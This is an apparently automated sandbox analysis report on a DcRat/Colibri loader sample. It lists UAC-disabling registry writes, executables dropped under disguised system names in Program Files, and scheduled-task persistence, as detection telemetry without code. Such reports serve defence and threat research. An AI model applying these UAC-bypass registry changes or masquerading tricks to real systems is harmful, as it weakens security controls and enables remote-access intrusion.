Malware Analysis Report

2024-11-30 22:11

Sample ID 241117-flc37s1lgx
Target 4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14
SHA256 4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14
Tags
dcrat evasion execution infostealer rat trojan colibri build1 discovery loader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14

Threat Level: Known bad

The file 4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14 was found to be: Known bad.

Malicious Activity Summary

dcrat evasion execution infostealer rat trojan colibri build1 discovery loader

Colibri Loader

UAC bypass

Dcrat family

DcRat

Colibri family

Process spawned unexpected child process

DCRat payload

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks computer location settings

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

System policy modification

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-17 04:57

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-17 04:57

Reported

2024-11-17 04:59

Platform

win7-20240903-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe"

Signatures

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\wininit.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\24dbde2999530e C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\wininit.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\56085415360792 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\VideoLAN\WMIADAP.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\VideoLAN\75a57c1bdf437c C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\RCXE8BF.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\c5b4cb5e9653cc C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\WmiPrvSE.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\RCXE199.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Internet Explorer\de-DE\RCXF571.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Internet Explorer\de-DE\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\services.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\services.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Internet Explorer\de-DE\sppsvc.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Internet Explorer\de-DE\0a1fd5f707cd16 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\RCXF15A.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\RCXF35E.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\75a57c1bdf437c C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\WmiPrvSE.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\VideoLAN\RCXF775.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\VideoLAN\WMIADAP.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
